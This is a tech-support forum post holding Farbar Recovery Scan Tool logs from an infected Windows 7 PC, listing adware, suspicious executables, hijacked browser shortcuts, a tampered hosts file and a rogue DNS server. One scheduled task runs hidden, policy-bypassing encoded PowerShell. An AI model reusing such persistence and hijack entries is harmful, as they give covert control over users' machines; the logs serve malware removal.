    2016-09-18 11:44 - 2016-01-21 18:10 - 00001461 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    2016-09-18 11:37 - 2009-07-14 00:45 - 00020720 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2016-09-18 11:37 - 2009-07-14 00:45 - 00020720 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2016-09-18 11:32 - 2009-07-14 01:13 - 00790482 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-09-18 11:32 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\inf
    2016-09-18 11:28 - 2016-06-22 14:50 - 00001096 __RSH C:\ProgramData\ntuser.pol
    2016-09-18 11:27 - 2009-07-14 01:08 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-09-18 10:24 - 2016-01-21 17:57 - 00000000 ____D C:\Users\Administrator\AppData\Local\ElevatedDiagnostics
    2016-09-18 10:24 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-09-18 07:44 - 2016-06-22 14:52 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\vlc
    2016-09-17 15:57 - 2016-01-21 15:50 - 00000000 ____D C:\Frank
    2016-09-17 15:11 - 2016-06-20 18:06 - 00000000 ____D C:\0000 decripted
    2016-09-16 21:45 - 2016-01-29 18:52 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2016-09-16 21:44 - 2016-01-29 18:50 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2016-09-16 21:25 - 2016-06-22 14:51 - 00000000 ____D C:\Users\Administrator\AppData\Local\Chromium
    2016-09-16 21:25 - 2009-07-13 23:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
    2016-09-16 21:14 - 2009-07-14 00:45 - 00438496 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2016-09-16 19:51 - 2016-06-22 15:50 - 00000138 _____ C:\Users\Administrator\AppData\Roaming\WB.CFG
    2016-09-16 10:53 - 2016-01-21 18:08 - 00111536 _____ C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
    2016-09-14 04:29 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\rescache
    2016-09-14 00:03 - 2016-01-29 17:35 - 00794036 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
    2016-09-13 17:22 - 2016-01-29 20:30 - 00000000 ____D C:\WINDOWS\system32\appraiser
    2016-09-13 17:22 - 2016-01-21 15:55 - 00000000 ____D C:\Program Files\SUPERAntiSpyware

    ==================== Files in the root of some directories =======

    2016-09-18 08:03 - 2016-09-18 08:04 - 7090176 _____ () C:\Users\Administrator\AppData\Roaming\agent.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 0054272 _____ () C:\Users\Administrator\AppData\Roaming\ApplicationHosting.dat
    2016-09-18 08:04 - 2016-09-18 08:04 - 2279413 _____ () C:\Users\Administrator\AppData\Roaming\Betastock.bin
    2016-09-18 08:03 - 2016-09-18 08:04 - 0070704 _____ () C:\Users\Administrator\AppData\Roaming\Config.xml
    2016-09-18 08:03 - 2016-09-18 08:01 - 2148864 _____ () C:\Users\Administrator\AppData\Roaming\Freshdinfind.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 1903938 _____ () C:\Users\Administrator\AppData\Roaming\Freshdinfind.tst
    2016-09-18 08:01 - 2016-09-18 08:03 - 0018528 _____ () C:\Users\Administrator\AppData\Roaming\InstallationConfiguration.xml
    2016-09-18 08:01 - 2016-09-18 08:01 - 0140288 _____ () C:\Users\Administrator\AppData\Roaming\Installer.dat
    2016-09-18 08:03 - 2016-09-18 08:01 - 2148864 _____ () C:\Users\Administrator\AppData\Roaming\Koncom.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 0072823 _____ () C:\Users\Administrator\AppData\Roaming\Koncom.tst
    2016-09-18 08:04 - 2016-09-18 08:03 - 2148864 _____ () C:\Users\Administrator\AppData\Roaming\Labin.exe
    2016-09-18 08:04 - 2016-09-18 08:04 - 0072823 _____ () C:\Users\Administrator\AppData\Roaming\Labin.tst
    2016-09-18 08:03 - 2016-09-18 08:04 - 0126464 _____ () C:\Users\Administrator\AppData\Roaming\lobby.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 0018432 _____ () C:\Users\Administrator\AppData\Roaming\Main.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 0005568 _____ () C:\Users\Administrator\AppData\Roaming\md.xml
    2016-09-18 08:04 - 2016-09-18 08:04 - 2279413 _____ () C:\Users\Administrator\AppData\Roaming\MedJob.bin
    2016-09-18 08:03 - 2016-09-18 08:04 - 0126464 _____ () C:\Users\Administrator\AppData\Roaming\noah.dat
    2016-09-18 08:12 - 2016-09-18 11:14 - 0000053 _____ () C:\Users\Administrator\AppData\Roaming\st
    2016-09-18 08:04 - 2016-09-18 08:03 - 2148864 _____ () C:\Users\Administrator\AppData\Roaming\Tipair.exe
    2016-09-18 08:04 - 2016-09-18 08:04 - 1903938 _____ () C:\Users\Administrator\AppData\Roaming\Tipair.tst
    2016-09-18 08:03 - 2016-09-18 08:03 - 2148864 _____ () C:\Users\Administrator\AppData\Roaming\Triodom.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 1903938 _____ () C:\Users\Administrator\AppData\Roaming\Triodom.tst
    2016-09-18 08:04 - 2016-09-18 08:04 - 2279413 _____ () C:\Users\Administrator\AppData\Roaming\True-Top.bin
    2016-09-18 08:04 - 2016-09-18 08:05 - 0001150 _____ () C:\Users\Administrator\AppData\Roaming\uninstall_temp.ico
    2016-09-18 08:03 - 2016-09-18 08:03 - 2148864 _____ () C:\Users\Administrator\AppData\Roaming\VillaStattom.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 0072823 _____ () C:\Users\Administrator\AppData\Roaming\VillaStattom.tst
    2016-06-22 15:50 - 2016-09-16 19:51 - 0000138 _____ () C:\Users\Administrator\AppData\Roaming\WB.CFG
    2016-09-18 07:59 - 2016-09-18 07:59 - 0895488 _____ () C:\Users\Administrator\AppData\Local\misgua.dll
    2016-09-18 07:59 - 2016-09-18 07:59 - 0002560 _____ () C:\Users\Administrator\AppData\Local\uninstallssl.exe
    2016-09-18 07:58 - 2016-09-18 07:58 - 0441344 _____ () C:\ProgramData\smp2.exe

    Files to move or delete:
    ====================
    C:\Users\Administrator\AppData\Local\misgua.dll
    C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe
    C:\ProgramData\smp2.exe


    Some files in TEMP:
    ====================

    C:\Users\Administrator\AppData\Local\Temp\FFFE.tmp.exe
    C:\Users\Administrator\AppData\Local\Temp\FFFF.tmp.exe
    C:\Users\Administrator\AppData\Local\Temp\fsd88F.exe
    C:\Users\Administrator\AppData\Local\Temp\GMXVRMA49M.exe
    C:\Users\Administrator\AppData\Local\Temp\HEANY4DXIP.exe
    C:\Users\Administrator\AppData\Local\Temp\IED4GWN5X5.exe
    C:\Users\Administrator\AppData\Local\Temp\IKCJH8XGY5.exe
    C:\Users\Administrator\AppData\Local\Temp\KFT2N0ATDM.exe
    C:\Users\Administrator\AppData\Local\Temp\KFTK2DSOJV.exe
    C:\Users\Administrator\AppData\Local\Temp\ludashisetup.exe
    C:\Users\Administrator\AppData\Local\Temp\LZNRZYLAR6.exe
    C:\Users\Administrator\AppData\Local\Temp\nsbB9D5.tmp.exe
    C:\Users\Administrator\AppData\Local\Temp\NSGGCKCSHQ.exe
    C:\Users\Administrator\AppData\Local\Temp\nsh8129.tmp.exe
    C:\Users\Administrator\AppData\Local\Temp\nsr2E87.tmp.exe
    C:\Users\Administrator\AppData\Local\Temp\OHZ9X79HC4.exe
    C:\Users\Administrator\AppData\Local\Temp\Setup.exe
    C:\Users\Administrator\AppData\Local\Temp\Setup_2048.exe
    C:\Users\Administrator\AppData\Local\Temp\UJXZFXYRJW.exe
    C:\Users\Administrator\AppData\Local\Temp\Uninstall.exe
    C:\Users\Administrator\AppData\Local\Temp\V3HV993T15.exe
    C:\Users\Administrator\AppData\Local\Temp\Y3YEWJT7RI.exe


    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll
    [2016-01-23 16:42] - [2016-01-23 16:42] - 0357888 ____A (Microsoft Corporation) D20C6CE262144127DB58445A41F9A3C4

    C:\WINDOWS\SysWOW64\dnsapi.dll
    [2016-01-23 16:42] - [2016-01-23 16:42] - 0270336 ____A (Microsoft Corporation) 38A1293D686C2BF6CFFF292A0F30F025

    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-09-13 17:53

    ==================== End of FRST.txt ============================
     
  2. photiost

    photiost Established Techie7 Member

    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-09-2016
    Ran by Administrator (18-09-2016 11:58:32)
    Running from C:\Users\Administrator\Downloads
    Windows 7 Professional Service Pack 1 (X64) (2016-01-21 22:09:17)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-1896049756-2371463424-3974721238-500 - Administrator - Enabled) => C:\Users\Administrator
    Guest (S-1-5-21-1896049756-2371463424-3974721238-501 - Limited - Disabled)
    HomeGroupUser$ (S-1-5-21-1896049756-2371463424-3974721238-1002 - Limited - Enabled)

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1211.101.114 - ALPS ELECTRIC CO., LTD.)
    DriverUpdate (HKLM-x32\...\DriverUpdate) (Version: 2.7.0 - Slimware Utilities Holdings, Inc.)
    DriverUpdate (x32 Version: 2.7.0 - Slimware Utilities Holdings, Inc.) Hidden
    Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
    Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 16.0.7167.2060 - Microsoft Corporation)
    Microsoft OneDrive (HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\OneDriveSetup.exe) (Version: 17.3.4604.0120 - Microsoft Corporation)
    Microsoft SharePoint Designer 2010 (HKLM-x32\...\Office14.SharePointDesigner) (Version: 14.0.7015.1000 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
    Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
    Mozilla Firefox 48.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 48.0.2 (x86 en-US)) (Version: 48.0.2 - Mozilla)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 48.0.2 - Mozilla)
    Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7167.2060 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Licensing Component (Version: 16.0.7167.2060 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7167.2060 - Microsoft Corporation) Hidden
    SafeFinder (HKLM-x32\...\{05019CFB-8FF6-4F88-8E9E-CF5E6A1AA38D}) (Version: 1.0.0.0 - Linkury) <==== ATTENTION
    SafeFinder (HKLM-x32\...\{1E1BF6F8-9785-45A5-9821-DF846308BE9F}) (Version: 1.0.0.0 - Linkury) <==== ATTENTION
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0017-0000-0000-0000000FF1CE}_Office14.SharePointDesigner_{8B883A57-E4BC-4745-8E6C-68168850F9DD}) (Version: - Microsoft)
    Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATTENTION
    Stellarium 0.14.2 (HKLM\...\Stellarium_is1) (Version: 0.14.2 - Stellarium team)
    SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1210 - SUPERAntiSpyware.com)
    Virtual Moon Atlas V6.0 (HKLM-x32\...\{3EB7A19B-690F-49BA-B494-CADA547D0DB9}_is1) (Version: - )
    VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {11B0901B-7817-4D91-9457-0870BE557C0A} - System32\Tasks\ttwifi => C:\Program Files (x86)\ttwifi\tiantianwifi.exe <==== ATTENTION
    Task: {11E0260B-A1B3-4C76-92FB-E4E45BBE5BA6} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
    Task: {163555F5-F8D6-41B9-9D58-3329BA276E77} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2016-09-18] () <==== ATTENTION
    Task: {23BF22F9-DEAB-43A2-8A94-5B101AB4E2E2} - System32\Tasks\{78047A47-0C79-0578-0A11-0C7F0F7A117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAOwA7ACAAIAA7ADsAOwAgADsAIAAgACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUA (the data entry has 9964 more characters). <==== ATTENTION
    Task: {28B31CF2-C3A5-410B-B28E-D3F477BBCC56} - System32\Tasks\{AC769F71-F24C-4982-9CD9-2399739747D0} => pcalua.exe -a "C:\Program Files (x86)\DPower\uninstaller.exe"
    Task: {33AA5276-F186-4F36-B614-FACEF7D12B73} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
    Task: {36A38FF0-FEA6-494C-8169-A84D4B5D4DB4} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-09-05] (Microsoft Corporation)
    Task: {4CE1D488-D903-4335-9AB7-3830BECDF912} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2016-09-13] (Microsoft Corporation)
    Task: {4DFEE54D-5A75-4674-9599-2CF0C1235984} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== ATTENTION
    Task: {4F4D22B5-7496-4CF9-9984-12320C3EEE6C} - System32\Tasks\nerta => C:\Program Files (x86)\Stlr\nerta\nerta.exe [2016-09-02] () <==== ATTENTION
    Task: {5AECB8E6-6A1D-4416-A94E-63AB73367CB3} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
    Task: {60C8E917-F7DE-40EC-90E1-52930F5A35CB} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe <==== ATTENTION
    Task: {77873BFF-B00B-4058-AEDC-951CEC91E632} - System32\Tasks\DriverUpdate Startup => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
    Task: {796A0AB1-3CEB-43A6-9673-AADD6332FCD0} - System32\Tasks\KuaiZip_Update => X86\Update.exe <==== ATTENTION
    Task: {7D4B7411-CA39-485E-885F-EAF4DF6F2E71} - System32\Tasks\e02c4bd5-54d5-4470-9ea0-a68d88112c00 => C:\Users\Administrator\AppData\Roaming\QuickCleaner\QuickCleanerCSUS.exe [2016-09-18] ()
    Task: {883EEFB8-329D-423A-BDA8-47E47587BF1A} - System32\Tasks\DriverUpdate Scan => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
    Task: {9CF158C5-EBBF-4534-947A-C011B643E9A5} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE <==== ATTENTION
    Task: {9FCD7E48-DD58-48DC-A2A7-68FB2FA6851C} - System32\Tasks\{5E89D5D4-C91B-4F37-AF11-F0CBE417CCC0} => pcalua.exe -a "C:\Program Files (x86)\mpck\uninstaller.exe"
    Task: {B4C9453B-5317-4006-9B25-BD4D32EE1256} - System32\Tasks\bvyvcvd => C:\Users\Administrator\AppData\Local\bvyvcvd\bvyvcvd.exe [2016-08-18] () <==== ATTENTION
    Task: {C30D90A2-350E-4FF9-9A31-334654945EDC} - System32\Tasks\ComputerZ-Tray => C:\Program Files (x86)\LuDaShi\ComputerZTray.exe <==== ATTENTION
    Task: {DF4D7109-8481-4C9A-9A89-CCB4B0D65A9A} - System32\Tasks\{E2E7A15A-991B-470C-85A5-CFECBCB02080} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Softcof\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\Softcof\uninstall.dat" -a uninstallme 1E1BF6F8-9785-45A5-9821-DF846308BE9F DeviceId=0a614ed4-c345-6988-f199-5cfd8209aae9 BarcodeId=51199006 ChannelId=6 DistributerName=APSF3GInstall
    Task: {E1E3A202-90D0-4A01-B8ED-D72D63271822} - System32\Tasks\{9CBDDEFC-08B0-4505-B272-4C0259D93CAD} => pcalua.exe -a "C:\Program Files (x86)\EasyHotspot\uninstaller.exe"
    Task: {EBD0F564-06A8-4CFE-8FF2-6C151538BA74} - System32\Tasks\PC SpeedUp Service Deactivator => C:\Program Files (x86)\PC Speed Up\PCSUSD.exe <==== ATTENTION
    Task: {EF0EA095-08F7-440A-B2BC-E59A63BEFDC8} - System32\Tasks\ByteFence Scan => C:\Program Files\ByteFence\ByteFence.exe <==== ATTENTION
    Task: {F3953AC7-982F-4CE5-A383-C09887DBEA40} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-09-05] (Microsoft Corporation)
    Task: {F3A5846C-8CA4-4CEF-8D20-35484B32105D} - System32\Tasks\Pritc => C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe [2016-09-18] (VLOME) <==== ATTENTION
    Task: {F41BB250-CA8B-4B02-9687-31435C3A2E46} - System32\Tasks\{C7D820FC-CDAB-40D6-BEDE-D25C4C86FE7F} => pcalua.exe -a "C:\Program Files (x86)\Common Files\K-Fax\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\K-Fax\uninstall.dat" -a uninstallme 05019CFB-8FF6-4F88-8E9E-CF5E6A1AA38D DeviceId=0a614ed4-c345-6988-f199-5cfd8209aae9 BarcodeId=51199006 ChannelId=6 DistributerName=APSF3GInstall
    Task: {FCB44360-EB78-42FD-BC6D-BBA436723783} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2016-09-13] (Microsoft Corporation)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\DriverUpdate Scan.job => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
    Task: C:\WINDOWS\Tasks\DriverUpdate Startup.job => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
    Task: C:\WINDOWS\Tasks\PC SpeedUp Service Deactivator.job => C:\Program Files (x86)\PC Speed Up\PCSUSD.exe <==== ATTENTION
    Task: C:\WINDOWS\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
    Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION

    ShortcutWithArgument: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://navsmart.info
    ShortcutWithArgument: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=g9izftpbl0cshmoau,488cdb43-66e8-4d85-9ddc-52057119e93e,
    ShortcutWithArgument: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://navsmart.info
    ShortcutWithArgument: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://navsmart.info
    ShortcutWithArgument: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://navsmart.info
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://navsmart.info
    ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://navsmart.info

    ==================== Loaded Modules (Whitelisted) ==============

    2016-09-18 08:04 - 2016-05-15 18:04 - 02089472 _____ () C:\ProgramData\Logic Handler\set.exe
    2016-09-18 08:03 - 2016-09-18 08:01 - 02148864 _____ () C:\ProgramData\CloudPrinter\CloudPrinter.exe
    2016-08-16 04:00 - 2016-08-16 04:00 - 00012288 _____ () C:\Program Files (x86)\Stlr\nerta\nertacs.exe
    2016-05-19 10:41 - 2016-05-19 10:41 - 00134656 _____ () C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 02148864 _____ () C:\ProgramData\Ronzap\Ronzap.exe
    2016-09-18 07:57 - 2016-09-18 07:57 - 00423936 _____ () C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs
    2015-12-26 04:59 - 2015-12-26 04:59 - 00158720 _____ () C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp
    2014-08-04 14:04 - 2012-11-08 21:55 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
    2016-09-02 17:10 - 2016-09-02 17:10 - 00033280 _____ () C:\Program Files (x86)\Stlr\nerta\nerta.exe
    2016-09-18 07:59 - 2016-09-18 07:59 - 00895488 _____ () C:\Users\Administrator\AppData\Local\misgua.dll
    2016-09-18 08:04 - 2016-09-18 08:04 - 00248320 _____ () C:\ProgramData\Ronzap\IndigoString.dll
    2016-02-23 15:47 - 2016-09-05 09:09 - 08921792 _____ () C:\Program Files (x86)\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\bsdpf64.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\bsdpr64.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\bsdpf64.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\bsdpr64.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

    ==================== Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)

    IE trusted site: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\localhost -> localhost
    IE trusted site: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\webcompanion.com -> hxxp://webcompanion.com
    IE restricted site: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\bet365.com -> hxxp://www.bet365.com
    IE restricted site: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\onclicktop.com -> hxxp://www.onclicktop.com
    IE restricted site: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\pdn-2.com -> hxxp://xml.pdn-2.com
    IE restricted site: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\...\targetctracker.com -> hxxp://n.targetctracker.com

    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2009-07-13 22:34 - 2016-09-18 08:49 - 00003554 ____A C:\WINDOWS\system32\Drivers\etc\hosts

    107.178.255.88 www.google-analytics.com
    107.178.255.88 www.statcounter.com
    107.178.255.88 statcounter.com
    107.178.255.88 ssl.google-analytics.com
    107.178.255.88 partner.googleadservices.com
    107.178.255.88 google-analytics.com
    107.178.248.130 static.doubleclick.net
    107.178.247.130 connect.facebook.net
    107.178.255.88 www.google-analytics.com
    107.178.255.88 www.statcounter.com
    107.178.255.88 statcounter.com
    107.178.255.88 ssl.google-analytics.com
    107.178.255.88 partner.googleadservices.com
    107.178.255.88 google-analytics.com
    107.178.248.130 static.doubleclick.net
    107.178.247.130 connect.facebook.net0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly
    0.0.0.0 tracking.opencandy.com.s3.amazonaws.com
    0.0.0.0 media.opencandy.com
    0.0.0.0 cdn.opencandy.com
    0.0.0.0 tracking.opencandy.com
    0.0.0.0 api.opencandy.com
    0.0.0.0 api.recommendedsw.com
    0.0.0.0 installer.betterinstaller.com
    0.0.0.0 installer.filebulldog.com
    0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net
    0.0.0.0 inno.bisrv.com
    0.0.0.0 nsis.bisrv.com
    0.0.0.0 cdn.file2desktop.com
    0.0.0.0 cdn.goateastcach.us
    0.0.0.0 cdn.guttastatdk.us

    There are 43 more lines.


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Control Panel\Desktop\\Wallpaper -> C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
    DNS Servers: 104.197.191.4
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    (Currently there is no automatic fix for this section.)


    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
    FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
    FirewallRules: [{7EBE8246-AF94-4134-9889-F67B7C69D295}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    FirewallRules: [{ED60FE75-E654-4E16-AFB4-97456ACE0E74}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
